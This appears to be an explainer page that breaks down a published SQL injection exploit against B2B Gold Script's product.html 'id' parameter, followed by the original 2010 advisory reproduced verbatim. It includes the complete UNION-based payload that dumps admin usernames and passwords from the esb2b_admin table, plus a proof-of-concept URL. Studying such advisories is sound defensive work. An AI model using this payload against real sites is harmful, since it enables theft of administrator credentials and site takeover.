B2B Gold Script 'id' Parameter SQL Injection Explained

B2B Gold Script 'id' Parameter SQL Injection Explained
What this paper is
This paper details a SQL injection vulnerability found in the B2B Gold Script, specifically within the id parameter of the product.html page. The exploit allows an attacker to extract administrator credentials (username and password) from the esb2b_admin table.
Simple technical breakdown
The vulnerability lies in how the web application handles the id parameter. When a user requests a product, the script likely uses the id value to query a database for product information. If the application doesn't properly sanitize or validate this id input, an attacker can inject malicious SQL code.
In this case, the attacker uses a UNION ALL SELECT statement. This technique allows them to combine the results of their malicious query with the results of the original, intended query. By carefully crafting the injected SQL, they can force the database to return specific data, in this instance, the administrator's username and password.
The exploit targets the esb2b_admin table and uses group_concat to combine multiple rows (if there were any) into a single string, separated by a colon (:).
Complete code and payload walkthrough
The core of the exploit is a specially crafted string that is appended to the id parameter in the URL.
Exploit String:
-9999+union+all+select+0,0,group_concat(es_admin_name,char(58),es_pwd)v3n0m,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+esb2b_admin--Let's break this down:
-9999: This is likely an attempt to provide an invalididthat will cause the original query to return no results. This is a common tactic to ensure that theUNION ALL SELECTpart of the query is the only one that produces output. The specific number-9999is arbitrary; any value that wouldn't normally exist as a valid product ID would serve this purpose.+: These are URL-encoded spaces. In a URL, spaces are often represented by%20or+. The exploit uses+for readability and likely because it's a common encoding.union+all+select: This is the core SQL injection command.UNION ALL: This operator combines the result set of twoSELECTstatements.ALLmeans that duplicate rows are included.SELECT: This keyword initiates a query to retrieve data.
0,0,group_concat(es_admin_name,char(58),es_pwd)v3n0m,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0: This part specifies the columns to be selected in the injected query.0(multiple times): These are placeholder values. The number of0s must match the number of columns in the original query that theUNION ALLstatement is trying to append to. Since the original query is unknown, the attacker has to guess or enumerate the number of columns. The exploit provides 220s plus thegroup_concatcolumn, suggesting the original query likely selected 23 columns. These0s are simply there to fill the column slots without returning sensitive information from the original query's context.group_concat(es_admin_name,char(58),es_pwd)v3n0m: This is the crucial part that extracts the sensitive data.group_concat(): This is a MySQL aggregate function that concatenates non-NULL values from a group into a single string. It's extremely useful for SQL injection when you want to retrieve multiple values from a table.es_admin_name: This is the name of the column in theesb2b_admintable that stores the administrator's username.char(58): This function returns the character with the ASCII value 58. ASCII 58 is the colon (:). This character is used as a separator between the username and the password in the output.es_pwd: This is the name of the column in theesb2b_admintable that stores the administrator's password.v3n0m: This is an alias given to the concatenated string. It's a common practice to add an alias, sometimes to help identify the injected column or just as a signature.
+from+esb2b_admin: This specifies the table from which to retrieve the data.from: SQL keyword indicating the table.esb2b_admin: The name of the table containing administrator credentials.
--: This is a SQL comment indicator. In many SQL dialects,--signifies the rest of the line is a comment. This is used to comment out any remaining part of the original query that might otherwise interfere with the injected SQL statement.
SQLi p0c (Proof of Concept) URL:
http://127.0.0.1/[path]/product.html?id=[SQLi]This shows how the exploit string would be appended to a legitimate URL. The [path] would be the directory where the B2B Gold Script is installed, and [SQLi] would be replaced by the full exploit string.
Mapping of code fragment/block to practical purpose:
| Code Fragment/Block | Practical Purpose
Original Exploit-DB Content (Verbatim)
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /
\ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <
|_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
.WEB.ID
-----------------------------------------------------------------------
B2B Gold Script (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : April, 30-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : B2B Gold Script
Vendor : http://www.alibabaclone.com/
Price : $499 USD
Google Dork : Use your brain & imagination :)
Overview :
B2B trading Marketplace Script clone of alibaba Marketplace script is a
wonderful solution to launch your own business to business and b2c site.
Script is packed with lot of features to provide a very sound foundation
to your trading portal site.
----------------------------------------------------------------
Exploit:
~~~~~~~
-9999+union+all+select+0,0,group_concat(es_admin_name,char(58),es_pwd)v3n0m,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+esb2b_admin--
SQLi p0c:
~~~~~~~
http://127.0.0.1/[path]/product.html?id=[SQLi]
----------------------------------------------------------------
Shoutz:
~~~~
- 'malingsial banyak cakap, you skill off bullshit on '
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,mywisdom,yadoy666,udhit
- c4uR (ah payah c4uR dipeser cengeng bruakakaka)
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- Chip D3 Bi0s & LatinHackTeam (Good Job & Good Research Brotha ;)
- elicha cristia [ luv You...luv You...luv You... :) ]
- N.O.C & Technical Support @office "except ahong (fuck you off)"
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~
v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com
Homepage: http://yogyacarderlink.web.id/
http://v3n0m.blogdetik.com/
http://elich4.blogspot.com/ << Update donk >_<
---------------------------[EOF]--------------------------------